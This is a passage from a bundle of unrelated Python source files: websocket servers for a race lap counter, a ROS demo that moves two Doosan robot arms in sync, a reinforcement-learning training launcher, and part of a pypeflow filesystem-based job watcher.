while 1:
try:
wsServer = WebsocketServer( port=PORT_NUMBER + 1, host='' )
wsServer.set_fn_message_received( message_received )
wsServer.run_forever()
except Exception as e:
wsServer = None
time.sleep( 5 )
def WsQueueListener( q ):
global wsServer
keepGoing = True
while keepGoing:
message = q.get()
if message.get('cmd', None) == 'exit':
keepGoing = False
elif wsServer and wsServer.hasClients():
wsServer.send_message_to_all( Utils.ToJson(message).encode() )
q.task_done()
wsServer = None
wsQ = Queue()
wsQThread = threading.Thread( target=WsQueueListener, name='WsQueueListener', args=(wsQ,) )
wsQThread.daemon = True
wsQThread.start()
wsThread = threading.Thread( target=WsServerLaunch, name='WsServer' )
wsThread.daemon = True
wsThread.start()
wsTimer = tTimerStart = None
def WsPost():
global wsServer, wsTimer, tTimerStart
if wsServer and wsServer.hasClients():
while 1:
try:
ram = GetResultsRAM()
break
except AttributeError:
time.sleep( 0.25 )
if ram:
wsQ.put( ram )
if wsTimer:
wsTimer.cancel()
wsTimer = tTimerStart = None
def WsRefresh( updatePrevious=False ):
global wsTimer, tTimerStart
if updatePrevious:
wsQ.put( {'cmd':'reload_previous'} )
return
# If we have a string of competitors, don't send the update
# until there is a gap of a second or more between arrivals.
if not tTimerStart:
tTimerStart = now()
else:
# Check whether more than 5 seconds have passed since this burst of updates began.
# If so, stop re-arming the timer and let the currently scheduled update fire
# (see the illustrative timeline after this function).
if (now() - tTimerStart).total_seconds() > 5.0:
return
wsTimer.cancel()
# Schedule an update to be sent in the next second.
# This either schedules the first update, or extends a pending update.
wsTimer = threading.Timer( 1.0, WsPost )
wsTimer.start()
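# Illustrative timing sketch (the times below are made-up examples): if riders cross
# at t=0.0s, 0.4s and 0.8s, each WsRefresh call cancels and re-arms the 1-second Timer,
# so a single WsPost fires at about t=1.8s. During a continuous stream of arrivals the
# 5-second check above stops the re-arming, so connected browsers still receive an
# update roughly every six seconds rather than being starved indefinitely.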
#-------------------------------------------------------------------
def GetLapCounterRefresh():
try:
return Utils.mainWin.lapCounter.GetState()
except:
return {
'cmd': 'refresh',
'labels': [],
'foregrounds': [],
'backgrounds': [],
'raceStartTime': None,
'lapElapsedClock': False,
}
def lap_counter_new_client(client, server):
server.send_message( client, json.dumps(GetLapCounterRefresh()) )
wsLapCounterServer = None
def WsLapCounterServerLaunch():
global wsLapCounterServer
while 1:
try:
wsLapCounterServer = WebsocketServer( port=PORT_NUMBER + 2, host='' )
wsLapCounterServer.set_fn_new_client( lap_counter_new_client )
wsLapCounterServer.run_forever()
except Exception as e:
wsLapCounterServer = None
time.sleep( 5 )
def WsLapCounterQueueListener( q ):
global wsLapCounterServer
keepGoing = True
while keepGoing:
message = q.get()
cmd = message.get('cmd', None)
if cmd == 'refresh':
if wsLapCounterServer and wsLapCounterServer.hasClients():
race = Model.race
message['tNow'] = datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%S.%f')[:-3]
message['curRaceTime'] = race.curRaceTime() if race and race.startTime else 0.0
wsLapCounterServer.send_message_to_all( Utils.ToJson(message).encode() )
elif cmd == 'exit':
keepGoing = False
q.task_done()
wsLapCounterServer = None
wsLapCounterQ = Queue()
wsLapCounterQThread = threading.Thread( target=WsLapCounterQueueListener, name='WsLapCounterQueueListener', args=(wsLapCounterQ,) )
wsLapCounterQThread.daemon = True
wsLapCounterQThread.start()
wsLapCounterThread = threading.Thread( target=WsLapCounterServerLaunch, name='WsLapCounterServer' )
wsLapCounterThread.daemon = True
wsLapCounterThread.start()
lastRaceName, lastMessage = None, None
def WsLapCounterRefresh():
global lastRaceName, lastMessage
race = Model.race
if not (race and race.isRunning()):
return
if not (wsLapCounterServer and wsLapCounterServer.hasClients()):
return
message, raceName = GetLapCounterRefresh(), GetRaceName()
if lastMessage != message or lastRaceName != raceName:
wsLapCounterQ.put( message )
lastMessage, lastRaceName = message, raceName
if __name__ == '__main__':
SetFileName( os.path.join('Gemma', '2015-11-10-A Men-r4-.html') )
six.print_( 'Started httpserver on port ' , PORT_NUMBER )
try:
time.sleep( 10000 )
except KeyboardInterrupt:
q.put( {'cmd':'exit'} )
|
m1013x2_no_sync.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# ##
# @brief [py demo] multi robot sync test
# @author Kab Kyoum Kim (kabkyoum.kim@doosan.com)
import rospy
import os
import threading, time
import sys
sys.dont_write_bytecode = True
sys.path.append( os.path.abspath(os.path.join(os.path.dirname(__file__),"../../../../common/imp")) ) # get import path : DSR_ROBOT.py
# for single robot
#import DR_init
#DR_init.__dsr__id = "dsr01"
#DR_init.__dsr__model = "m1013"
#from DSR_ROBOT import *
# for multi robot
########from DSR_ROBOT_MULTI import *
from DSR_ROBOT import *
def shutdown():
print("shutdown time!")
print("shutdown time!")
print("shutdown time!")
pub_stop_r1.publish(stop_mode=STOP_TYPE_QUICK)
pub_stop_r2.publish(stop_mode=STOP_TYPE_QUICK)
return 0
def msgRobotState_cb_r1(msg):
msgRobotState_cb_r1.count += 1
if (0==(msgRobotState_cb_r1.count % 100)):
rospy.loginfo("________ ROBOT[1] STATUS ________")
print(" robot_state : %d" % (msg.robot_state))
print(" robot_state_str : %s" % (msg.robot_state_str))
print(" current_posj : %7.3f %7.3f %7.3f %7.3f %7.3f %7.3f" % (msg.current_posj[0],msg.current_posj[1],msg.current_posj[2],msg.current_posj[3],msg.current_posj[4],msg.current_posj[5]))
#print(" io_control_box : %d" % (msg.io_control_box))
##print(" io_modbus : %d" % (msg.io_modbus))
##print(" error : %d" % (msg.error))
#print(" access_control : %d" % (msg.access_control))
#print(" homming_completed : %d" % (msg.homming_completed))
#print(" tp_initialized : %d" % (msg.tp_initialized))
print(" speed : %d" % (msg.speed))
#print(" mastering_need : %d" % (msg.mastering_need))
#print(" drl_stopped : %d" % (msg.drl_stopped))
#print(" disconnected : %d" % (msg.disconnected))
msgRobotState_cb_r1.count = 0
def msgRobotState_cb_r2(msg):
msgRobotState_cb_r2.count += 1
if (0==(msgRobotState_cb_r2.count % 100)):
rospy.loginfo("________ ROBOT[2] STATUS ________")
print(" robot_state : %d" % (msg.robot_state))
print(" robot_state_str : %s" % (msg.robot_state_str))
print(" current_posj : %7.3f %7.3f %7.3f %7.3f %7.3f %7.3f" % (msg.current_posj[0],msg.current_posj[1],msg.current_posj[2],msg.current_posj[3],msg.current_posj[4],msg.current_posj[5]))
#print(" io_control_box : %d" % (msg.io_control_box))
##print(" io_modbus : %d" % (msg.io_modbus))
##print(" error : %d" % (msg.error))
#print(" access_control : %d" % (msg.access_control))
#print(" homming_completed : %d" % (msg.homming_completed))
#print(" tp_initialized : %d" % (msg.tp_initialized))
print(" speed : %d" % (msg.speed))
#print(" mastering_need : %d" % (msg.mastering_need))
#print(" drl_stopped : %d" % (msg.drl_stopped))
#print(" disconnected : %d" % (msg.disconnected))
msgRobotState_cb_r2.count = 0
def thread_subscriber_r1(robot_id, robot_model):
rospy.Subscriber('/'+ robot_id + robot_model +'/state', RobotState, msgRobotState_cb_r1)
rospy.spin()
#rospy.spinner(2)
def thread_subscriber_r2(robot_id, robot_model):
rospy.Subscriber('/'+ robot_id + robot_model +'/state', RobotState, msgRobotState_cb_r2)
rospy.spin()
#rospy.spinner(2)
if __name__ == "__main__":
rospy.init_node('m1013x2_amove_py')
rospy.on_shutdown(shutdown)
robot_id1 = "dsr01"; robot_model1 = "m1013"
robot_id2 = "dsr02"; robot_model2 = "m1013"
r1 = CDsrRobot(robot_id1,robot_model1)
r2 = CDsrRobot(robot_id2, robot_model2)
pub_stop_r1 = rospy.Publisher('/'+ robot_id1 + robot_model1 +'/stop', RobotStop, queue_size=10)
pub_stop_r2 = rospy.Publisher('/'+ robot_id2 + robot_model2 +'/stop', RobotStop, queue_size=10)
#t1 = threading.Thread(target=thread_subscriber_r1, args=(robot_id1, robot_model1))
#t1.daemon = True
#t1.start()
#t2 = threading.Thread(target=thread_subscriber_r2, args=(robot_id2, robot_model2))
#t2.daemon = True
#t2.start()
#----------------------------------------------------------------------
JReady = posj(0, -20, 110, 0, 60, 0)
J00 = posj(-180, 0, -145, 0, -35, 0)
J01r = posj(-180.0, 71.4, -145.0, 0.0, -9.7, 0.0)
J02r = posj(-180.0, 67.7, -144.0, 0.0, 76.3, 0.0)
J03r = posj(-180.0, 0.0, 0.0, 0.0, 0.0, 0.0)
J04r = posj(-90.0, 0.0, 0.0, 0.0, 0.0, 0.0)
J04r1 = posj(-90.0, 30.0, -60.0, 0.0, 30.0, -0.0)
J04r2 = posj(-90.0, -45.0, 90.0, 0.0, -45.0, -0.0)
J04r3 = posj(-90.0, 60.0, -120.0, 0.0, 60.0, -0.0)
J04r4 = posj(-90.0, 0.0, -0.0, 0.0, 0.0, -0.0)
J05r = posj(-144.0, -4.0, -84.8, -90.9, 54.0, -1.1)
J07r = posj(-152.4, 12.4, -78.6, 18.7, -68.3, -37.7)
J08r = posj(-90.0, 30.0, -120.0, -90.0, -90.0, 0.0)
JEnd = posj(0.0, -12.6, 101.1, 0.0, 91.5, -0.0)
dREL1 = posx(0, 0, 350, 0, 0, 0)
dREL2 = posx(0, 0, -350, 0, 0, 0)
velx = [0, 0]
accx = [0, 0]
vel_spi = [400, 400]
acc_spi = [150, 150]
J1 = posj(81.2, 20.8, 127.8, 162.5, 56.1, -37.1)
X0 = posx(-88.7, 799.0, 182.3, 95.7, 93.7, 133.9)
X1 = posx(304.2, 871.8, 141.5, 99.5, 84.9, 133.4)
X2 = posx(437.1, 876.9, 362.1, 99.6, 84.0, 132.1)
X3 = posx(-57.9, 782.4, 478.4, 99.6, 84.0, 132.1)
amp = [0, 0, 0, 30, 30, 0]
period = [0, 0, 0, 3, 6, 0]
x01 = [423.6, 334.5, 651.2, 84.7, -180.0, 84.7]
x02 = [423.6, 34.5, 951.2, 68.2, -180.0, 68.2]
x03 = [423.6, -265.5, 651.2, 76.1, -180.0, 76.1]
x04 = [423.6, 34.5, 351.2, 81.3, -180.0, 81.3]
while not rospy.is_shutdown():
r1.amovej(JReady, 20, 20)
r2.amovej(JReady, 20, 20)
r1.mwait(); r2.mwait()
r1.amovej(J1, time = 3)
r2.amovej(J1, time = 3)
r1.mwait(); r2.mwait()
r1.amovel(X3, time = 2.5)
r2.amovel(X3, time = 2.5)
r1.mwait(); r2.mwait()
for i in range(1, 3):
r1.amovel(X2, time = 2.5, r = 50)
r2.amovel(X2, time = 2.5, r = 50)
r1.mwait(); r2.mwait()
r1.amovel(X1, time = 1.5, r = 50)
r2.amovel(X1, time = 1.5, r = 50)
r1.move_wait(); r2.move_wait()
r1.amovel(X0, time = 2.5)
r2.amovel(X0, time = 2.5)
r1.move_wait(); r2.move_wait()
r1.amovel(X1, time = 2.5, r = 50)
r2.amovel(X1, time = 2.5, r = 50)
r1.move_wait(); r2.move_wait()
r1.amovel(X2, time = 1.5, r = 50)
r2.amovel(X2, time = 1.5, r = 50)
r1.move_wait(); r2.move_wait()
r1.amovel(X3, time = 2.5, r = 50)
r2.amovel(X3, time = 2.5, r = 50)
r1.move_wait(); r2.move_wait()
r1.amovej(J00, time = 6)
r2.amovej(J00, time = 6)
r1.move_wait(); r2.move_wait()
r1.amovej(J01r, time = 2, r = 100)
r2.amovej(J01r, time = 2, r = 100)
r1.move_wait(); r2.move_wait()
r1.amovej(J02r, time = 2, r = 50)
r2.amovej(J02r, time = 2, r = 50)
r1.move_wait(); r2.move_wait()
r1.amovej(J03r, time = 2)
r2.amovej(J03r, time = 2)
r1.move_wait(); r2.move_wait()
r1.amovej(J04r, time = 1.5)
r2.amovej(J04r, time = 1.5)
r1.move_wait(); r2.move_wait()
r1.amovej(J04r1, time = 2, r = 50)
r2.amovej(J04r1, time = 2, r = 50)
r1.move_wait(); r2.move_wait()
r1.amovej(J04r2, time = 4, r = 50)
r2.amovej(J04r2, time = 4, r = 50)
r1.move_wait(); r2.move_wait()
r1.amovej(J04r3, time = 4, r = 50)
r2.amovej(J04r3, time = 4, r = 50)
r1.move_wait(); r2.move_wait()
r1.amovej(J04r4, time = 2)
r2.amovej(J04r4, time = 2)
r1.move_wait(); r2.move_wait()
r1.amovej(J05r, time = 2.5, r = 100)
r2.amovej(J05r, time = 2.5, r = 100)
r1.move_wait(); r2.move_wait()
r1.amovel(dREL1, time = 1, ref = DR_TOOL, r = 50)
r2.amovel(dREL1, time = 1, ref = DR_TOOL, r = 50)
r1.move_wait(); r2.move_wait()
r1.amovel(dREL2, time = 1.5, ref = DR_TOOL, r = 100)
r2.amovel(dREL2, time = 1.5, ref = DR_TOOL, r = 100)
r1.move_wait(); r2.move_wait()
r1.amovej(J07r, time = 1.5, r = 100)
r2.amovej(J07r, time = 1.5, r = 100)
r1.move_wait(); r2.move_wait()
r1.amovej(J08r, time = 2)
r2.amovej(J08r, time = 2)
r1.move_wait(); r2.move_wait()
r1.amovej(JEnd, time = 4)
r2.amovej(JEnd, time = 4)
r1.move_wait(); r2.move_wait()
r1.amove_periodic([0,0,0,30,30,0],[0,0,0,3,6,0], atime=0,repeat=1, ref=DR_TOOL)
r2.amove_periodic([0,0,0,30,30,0],[0,0,0,3,6,0], atime=0,repeat=1, ref=DR_TOOL)
r1.move_wait(); r2.move_wait()
r1.amove_spiral (rev=3, rmax=200, lmax=100, vel=400, acc=150, axis=DR_AXIS_X, ref=DR_TOOL)
r2.amove_spiral (rev=3, rmax=200, lmax=100, vel=400, acc=150, axis=DR_AXIS_X, ref=DR_TOOL)
r1.move_wait(); r2.move_wait()
r1.amovel(x01, time = 2)
r2.amovel(x01, time = 2)
r1.move_wait(); r2.move_wait()
r1.amovel(x04, time = 2, r = 100)
r2.amovel(x04, time = 2, r = 100)
r1.move_wait(); r2.move_wait()
r1.amovel(x03, time = 2, r = 100)
r2.amovel(x03, time = 2, r = 100)
r1.move_wait(); r2.move_wait()
r1.amovel(x02, time = 2, r = 100)
r2.amovel(x02, time = 2, r = 100)
r1.move_wait(); r2.move_wait()
r1.amovel(x01, time = 2)
r2.amovel(x01, time = 2)
r1.move_wait(); r2.move_wait()
r1.amovec(x02, x04, time = 4, angle = 360)
r2.amovec(x02, x04, time = 4, angle = 360)
r1.move_wait(); r2.move_wait()
#----------------------------------------------------------------------
print('good bye!')
|
run.py
|
#!/usr/bin/env python3
# encoding: utf-8
"""
Usage:
python [options]
Options:
-h,--help                   show this help message
-a,--algorithm=<name>       training algorithm
    specify the training algorithm [default: ppo]
-c,--copys=<n>              number of parallel training copies
    number of environment copies that collect data in parallel [default: 1]
-e,--env=<file>             path of the Unity environment
    specify the path of the built UNITY3D training environment [default: None]
-g,--graphic                whether to show the graphic interface
    whether to show the graphic interface when using UNITY3D [default: False]
-i,--inference              inference mode
    run inference with the trained model instead of training policies [default: False]
-m,--models=<n>             how many models to train at the same time
    specify the number of trials that use different random seeds [default: 1]
-n,--name=<name>            name of this training run
    specify the name of this training task [default: None]
-p,--port=<n>               port
    specify the port used to communicate with the UNITY3D training environment [default: 5005]
-r,--rnn                    whether to use an RNN model
    whether to use an rnn [GRU, LSTM, ...] or not [default: False]
-s,--save-frequency=<n>     save frequency
    specify the interval for saving model checkpoints [default: None]
-t,--train-step=<n>         total number of training steps
    specify the number of training steps for optimizing the policy model [default: None]
-u,--unity                  whether to use the Unity client
    whether to train with the UNITY3D editor [default: False]
--apex=<str>                i.e. "learner"/"worker"/"buffer"/"evaluator" [default: None]
--unity-env=<name>          name of the Unity environment
    specify the name of the UNITY3D training environment [default: None]
--config-file=<file>        hyper-parameter config file for the model
    specify the path of the training configuration file [default: None]
--store-dir=<file>          directory for saving models, logs and data
    specify the directory that stores models, logs and other data [default: None]
--seed=<n>                  global random seed of the trainer
    specify the random seed for the random, numpy and tensorflow modules [default: 42]
--unity-env-seed=<n>        random seed of the Unity environment
    specify the environment random seed of UNITY3D [default: 42]
--max-step=<n>              maximum steps per episode
    specify the maximum number of steps per episode [default: None]
--train-episode=<n>         total number of training episodes
    specify the maximum number of training episodes [default: None]
--train-frame=<n>           total number of training samples
    specify the maximum number of training steps interacting with the environment [default: None]
--load=<name>               training name of the model to load
    specify the name of the pre-trained model to load [default: None]
--prefill-steps=<n>         number of experiences to prefill
    specify the number of experiences to collect before training starts, used for off-policy algorithms [default: None]
--prefill-choose            during the no_op (prefill) phase, choose actions randomly rather than setting them to 0
    whether to choose actions with the model or randomly [default: False]
--gym                       whether to use a gym training environment
    whether to train with gym [default: False]
--gym-env=<name>            name of the gym environment
    specify the environment name of gym [default: CartPole-v0]
--gym-env-seed=<n>          random seed of the gym environment
    specify the environment random seed of gym [default: 42]
--render-episode=<n>        episode from which to start rendering the gym environment
    specify when to start rendering the graphic interface of the gym environment [default: None]
--info=<str>                description of this training run, wrapped in double quotes
    write additional information that describes this training task [default: None]
--use-wandb                 whether to upload data to W&B
    whether to upload the training log to WandB [default: False]
--hostname                  whether to append the hostname to the training name
    whether to concatenate the hostname with the training name [default: False]
--no-save                   whether to save models, logs and training data during training
    specify whether to save models/logs/summaries while training [default: False]
Example:
gym:
python run.py --gym -a dqn --gym-env CartPole-v0 -c 12 -n dqn_cartpole --no-save
unity:
python run.py -u -a ppo -n run_with_unity
python run.py -e /root/env/3dball.app -a sac -n run_with_execution_file
"""
import os
os.environ["CUDA_VISIBLE_DEVICES"] = "0, 1"
import sys
if sys.platform.startswith('win'):
import win32api
import win32con
import _thread
def _win_handler(event, hook_sigint=_thread.interrupt_main):
'''
handle the event of 'Ctrl+c' in windows operating system.
'''
if event == 0:
hook_sigint()
return 1
return 0
# Add the _win_handler function to the windows console's handler function list
win32api.SetConsoleCtrlHandler(_win_handler, 1)
import time
import logging
from typing import Dict
from copy import deepcopy
from docopt import docopt
from multiprocessing import Process
from rls.common.trainer import Trainer
from rls.common.config import Config
from rls.common.yaml_ops import load_yaml
from rls.parse.parse_op import parse_options
from rls.utils.display import show_dict
from rls.utils.logging_utils import set_log_level
set_log_level(logging.INFO)
def get_options(options: Dict) -> Config:
'''
Resolves command-line arguments
params:
options: dictionary of command-line arguments
return:
op: an instance of Config class that contains the parameters
'''
def f(k, t): return None if options[k] == 'None' else t(options[k])
op = Config()
op.add_dict(dict([
['inference', bool(options['--inference'])],
['algo', str(options['--algorithm'])],
['use_rnn', bool(options['--rnn'])],
['algo_config', f('--config-file', str)],
['env', f('--env', str)],
['port', int(options['--port'])],
['unity', bool(options['--unity'])],
['graphic', bool(options['--graphic'])],
['name', f('--name', str)],
['save_frequency', f('--save-frequency', int)],
['models', int(options['--models'])],
['store_dir', f('--store-dir', str)],
['seed', int(options['--seed'])],
['unity_env_seed', int(options['--unity-env-seed'])],
['max_step_per_episode', f('--max-step', int)],
['max_train_step', f('--train-step', int)],
['max_train_frame', f('--train-frame', int)],
['max_train_episode', f('--train-episode', int)],
['load', f('--load', str)],
['prefill_steps', f('--prefill-steps', int)],
['prefill_choose', bool(options['--prefill-choose'])],
['gym', bool(options['--gym'])],
['n_copys', int(options['--copys'])],
['gym_env', str(options['--gym-env'])],
['gym_env_seed', int(options['--gym-env-seed'])],
['render_episode', f('--render-episode', int)],
['info', f('--info', str)],
['use_wandb', bool(options['--use-wandb'])],
['unity_env', f('--unity-env', str)],
['apex', f('--apex', str)],
['hostname', bool(options['--hostname'])],
['no_save', bool(options['--no-save'])]
]))
return op
def agent_run(*args):
'''
Start a training task
'''
Trainer(*args)()
def main():
options = docopt(__doc__)
options = get_options(dict(options))
show_dict(options.to_dict)
trails = options.models
assert trails > 0, '--models must be greater than 0.'
env_args, buffer_args, train_args = parse_options(options, default_config=load_yaml(f'./config.yaml'))
if options.inference:
Trainer(env_args, buffer_args, train_args).evaluate()
return
if options.apex is not None:
train_args.update(load_yaml(f'./rls/distribute/apex/config.yaml'))
Trainer(env_args, buffer_args, train_args).apex()
else:
if trails == 1:
agent_run(env_args, buffer_args, train_args)
elif trails > 1:
processes = []
for i in range(trails):
_env_args, _buffer_args, _train_args = map(deepcopy, [env_args, buffer_args, train_args])
_train_args.seed += i * 10
_train_args.name += f'/{i}'
_train_args.allow_print = True # NOTE: setting this could block other processes' print function
if _env_args.type == 'unity':
_env_args.port = env_args.port + i
p = Process(target=agent_run, args=(_env_args, _buffer_args, _train_args))
p.start()
time.sleep(10)
processes.append(p)
[p.join() for p in processes]
if __name__ == "__main__":
try:
import colored_traceback
colored_traceback.add_hook()
except ImportError:
pass
try:
main()
except Exception as e:
print(e)
sys.exit()
|
fs_based.py
|
#! python2.7
"""Filesytem-based process-watcher.
This is meant to be part of a 2-process system. For now, let's call these processes the Definer and the Watcher.
* The Definer creates a graph of tasks and starts a resolver loop, like pypeflow. It keeps a Waiting list, a Running list, and a Done list. It then communicates with the Watcher.
* The Watcher has 3 basic functions in its API.
1. Spawn jobs.
2. Kill jobs.
3. Query jobs.
1. Spawning jobs
The job definition includes the script, how to run it (locally, qsub, etc.), and maybe some details (unique-id, run-directory). The Watcher then:
* wraps the script with something that updates a heartbeat-file periodically,
* spawns each job (possibly as a background process locally),
* and records info (including PID or qsub-name) in a persistent database.
2. Kill jobs.
Since it has a persistent database, it can always kill any job, upon request.
3. Query jobs.
Whenever requested, it can poll the filesystem for all or any jobs, returning the subset of completed jobs. (For NFS efficiency, all the job-exit sentinel files can be in the same directory, along with the heartbeats.)
The Definer would call the Watcher to spawn tasks, and then periodically to poll them. Because these are both now single-threaded, the Watcher *could* be a function within the Definer, or it could be a blocking call to a separate process. With proper locking on the database, users could also query the same executable as a separate process.
Caching/timestamp-checking would be done in the Definer, flexibly specific to each Task.
Eventually, the Watcher could be in a different programming language. Maybe perl. (In bash, a background heartbeat gets its own process group, so it can be hard to clean up.)
"""
from __future__ import print_function
try:
from shlex import quote
except ImportError:
from pipes import quote
import collections
import contextlib
import copy
import glob
import json
import logging
import os
import pprint
import re
import signal
import string
import subprocess
import sys
import time
import traceback
from pypeflow.io import capture, syscall
log = logging.getLogger(__name__)
HEARTBEAT_RATE_S = 10.0
ALLOWED_SKEW_S = 120.0
STATE_FN = 'state.py'
Job = collections.namedtuple('Job', ['jobid', 'cmd', 'rundir', 'options'])
MetaJob = collections.namedtuple('MetaJob', ['job', 'lang_exe'])
lang_python_exe = sys.executable
lang_bash_exe = '/bin/bash'
@contextlib.contextmanager
def cd(newdir):
prevdir = os.getcwd()
log.debug('CD: %r <- %r' %(newdir, prevdir))
os.chdir(os.path.expanduser(newdir))
try:
yield
finally:
log.debug('CD: %r -> %r' %(newdir, prevdir))
os.chdir(prevdir)
class MetaJobClass(object):
ext = {
lang_python_exe: '.py',
lang_bash_exe: '.bash',
}
def get_wrapper(self):
return 'run-%s%s' %(self.mj.job.jobid, self.ext[self.mj.lang_exe])
def get_sentinel(self):
return 'exit-%s' %self.mj.job.jobid # in watched dir
def get_heartbeat(self):
return 'heartbeat-%s' %self.mj.job.jobid # in watched dir
def get_pid(self):
return self.mj.pid
def kill(self, pid, sig):
stored_pid = self.get_pid()
if not pid:
pid = stored_pid
log.info('Not passed a pid to kill. Using stored pid:%s' %pid)
if pid and stored_pid:
if pid != stored_pid:
log.error('pid:%s != stored_pid:%s' %(pid, stored_pid))
os.kill(pid, sig)
def __init__(self, mj):
self.mj = mj
class State(object):
def get_state_fn(self):
return os.path.join(self.__directory, STATE_FN)
def get_directory(self):
return self.__directory
def get_directory_wrappers(self):
return os.path.join(self.__directory, 'wrappers')
def get_directory_heartbeats(self):
return os.path.join(self.__directory, 'heartbeats')
def get_directory_exits(self):
return os.path.join(self.__directory, 'exits')
def get_directory_jobs(self):
# B/c the other directories can get big, we put most per-job data here, under each jobid.
return os.path.join(self.__directory, 'jobs')
def get_directory_job(self, jobid):
return os.path.join(self.get_directory_jobs(), jobid)
def submit_background(self, bjob):
"""Run job in background.
Record in state.
"""
self.top['jobs'][bjob.mjob.job.jobid] = bjob
jobid = bjob.mjob.job.jobid
mji = MetaJobClass(bjob.mjob)
script_fn = os.path.join(self.get_directory_wrappers(), mji.get_wrapper())
exe = bjob.mjob.lang_exe
run_dir = self.get_directory_job(jobid)
makedirs(run_dir)
with cd(run_dir):
bjob.submit(self, exe, script_fn) # Can raise
log.info('Submitted backgroundjob=%s'%repr(bjob))
self.top['jobids_submitted'].append(jobid)
def get_mji(self, jobid):
mjob = self.top['jobs'][jobid].mjob
return MetaJobClass(mjob)
def get_bjob(self, jobid):
return self.top['jobs'][jobid]
def get_bjobs(self):
return self.top['jobs']
def get_mjobs(self):
return {jobid: bjob.mjob for jobid, bjob in self.top['jobs'].iteritems()}
def add_deleted_jobid(self, jobid):
self.top['jobids_deleted'].append(jobid)
def serialize(self):
return pprint.pformat(self.top)
@staticmethod
def deserialize(directory, content):
state = State(directory)
state.top = eval(content)
state.content_prev = content
return state
@staticmethod
def create(directory):
state = State(directory)
makedirs(state.get_directory_wrappers())
makedirs(state.get_directory_heartbeats())
makedirs(state.get_directory_exits())
#system('lfs setstripe -c 1 {}'.format(state.get_directory_heartbeats())) # no improvement noticed
makedirs(state.get_directory_jobs())
return state
def __init__(self, directory):
self.__directory = os.path.abspath(directory)
self.content_prev = ''
self.top = dict()
self.top['jobs'] = dict()
self.top['jobids_deleted'] = list()
self.top['jobids_submitted'] = list()
def get_state(directory):
state_fn = os.path.join(directory, STATE_FN)
if not os.path.exists(state_fn):
return State.create(directory)
try:
return State.deserialize(directory, open(state_fn).read())
except Exception:
log.exception('Failed to read state "%s". Ignoring (and soon over-writing) current state.'%state_fn)
# TODO: Backup previous STATE_FN?
return State(directory)
def State_save(state):
# TODO: RW Locks, maybe for runtime of whole program.
content = state.serialize()
content_prev = state.content_prev
if content == content_prev:
return
fn = state.get_state_fn()
open(fn, 'w').write(content)
log.debug('saved state to %s' %repr(os.path.abspath(fn)))
def Job_get_MetaJob(job, lang_exe=lang_bash_exe):
return MetaJob(job, lang_exe=lang_exe)
def MetaJob_wrap(mjob, state):
"""Write wrapper contents to mjob.wrapper.
"""
wdir = state.get_directory_wrappers()
hdir = state.get_directory_heartbeats()
edir = state.get_directory_exits()
metajob_rundir = mjob.job.rundir
bash_template = """#!%(lang_exe)s
printenv
echo
set -x
%(cmd)s
"""
# We do not bother with 'set -e' here because this script is run either
# in the background or via qsub.
templates = {
lang_python_exe: python_template,
lang_bash_exe: bash_template,
}
mji = MetaJobClass(mjob)
wrapper_fn = os.path.join(wdir, mji.get_wrapper())
exit_sentinel_fn=os.path.join(edir, mji.get_sentinel())
heartbeat_fn=os.path.join(hdir, mji.get_heartbeat())
rate = HEARTBEAT_RATE_S
command = mjob.job.cmd
prog = 'heartbeat-wrapper' # missing in mobs
prog = 'python2.7 -m pwatcher.mains.fs_heartbeat'
heartbeat_wrapper_template = "{prog} --directory={metajob_rundir} --heartbeat-file={heartbeat_fn} --exit-file={exit_sentinel_fn} --rate={rate} {command} || echo 99 >| {exit_sentinel_fn}"
# We write 99 into exit-sentinel if the wrapper fails.
wrapped = heartbeat_wrapper_template.format(**locals())
log.debug('Wrapped "%s"' %wrapped)
wrapped = templates[mjob.lang_exe] %dict(
lang_exe=mjob.lang_exe,
cmd=wrapped,
)
log.debug('Writing wrapper "%s"' %wrapper_fn)
open(wrapper_fn, 'w').write(wrapped)
def background(script, exe='/bin/bash'):
"""Start script in background (so it keeps going when we exit).
Run in cwd.
For now, stdout/stderr are captured.
Return pid.
"""
args = [exe, script]
sin = open(os.devnull)
sout = open('stdout', 'w')
serr = open('stderr', 'w')
pseudo_call = '{exe} {script} 1>|stdout 2>|stderr & '.format(exe=exe, script=script)
log.info('dir: {!r}\nCALL:\n {!r}'.format(os.getcwd(), pseudo_call))
proc = subprocess.Popen([exe, script], stdin=sin, stdout=sout, stderr=serr)
pid = proc.pid
log.info('pid=%s pgid=%s sub-pid=%s' %(os.getpid(), os.getpgid(0), proc.pid))
#checkcall = 'ls -l /proc/{}/cwd'.format(
# proc.pid)
#system(checkcall, checked=True)
return pid
def qstripped(option, flag='-q'):
"""Given a string of options, remove any -q foo.
(No longer used.)
>>> qstripped('-xy -q foo -z bar')
'-xy -z bar'
>>> qstripped('-xy -p foo -z bar', '-p')
'-xy -z bar'
"""
# For now, do not strip -qfoo
vals = option.strip().split()
while flag in vals:
i = vals.index(flag)
vals = vals[0:i] + vals[i+2:]
return ' '.join(vals)
class MetaJobLocal(object):
"""For jobs on the local machine, with process-watching.
We cannot simply run with '&' because then we would not know how
to kill the new background job.
"""
def submit(self, state, exe, script_fn):
"""Can raise.
"""
pid = background(script_fn, exe=self.mjob.lang_exe)
def kill(self, state, heartbeat):
"""Can raise.
(Actually, we could derive heartbeat from state. But for now, we know it anyway.)
"""
hdir = state.get_directory_heartbeats()
heartbeat_fn = os.path.join(hdir, heartbeat)
with open(heartbeat_fn) as ifs:
line = ifs.readline()
pid = line.split()[1]
pid = int(pid)
pgid = line.split()[2]
pgid = int(pgid)
sig = signal.SIGKILL
log.info('Sending signal(%s) to pgid=-%s (pid=%s) based on heartbeat=%r' %(sig, pgid, pid, heartbeat))
try:
os.kill(-pgid, sig)
except Exception:
log.exception('Failed to kill(%s) pgid=-%s for %r. Trying pid=%s' %(sig, pgid, heartbeat_fn, pid))
os.kill(pid, sig)
def __repr__(self):
return 'MetaJobLocal(%s)' %repr(self.mjob)
def __init__(self, mjob):
self.mjob = mjob # PUBLIC
class MetaJobSubmit(object):
"""Generic job-submission, non-blocking.
Add shebang to script.
If running locally, then caller must append '&' onto job_submit to put job in background.
"""
def submit(self, state, exe, script_fn):
"""Run in cwd, in background.
Can raise.
"""
run_dir = os.getcwd()
job_name = self.get_job_name()
#job_nproc = self.job_nproc
#job_mb = self.job_mb
#job_queue = self.job_queue
# Add shebang, in case shell_start_mode=unix_behavior (for SGE).
# https://github.com/PacificBiosciences/FALCON/pull/348
with open(script_fn, 'r') as original: data = original.read()
with open(script_fn, 'w') as modified: modified.write("#!/bin/bash" + "\n" + data)
mapping = dict(
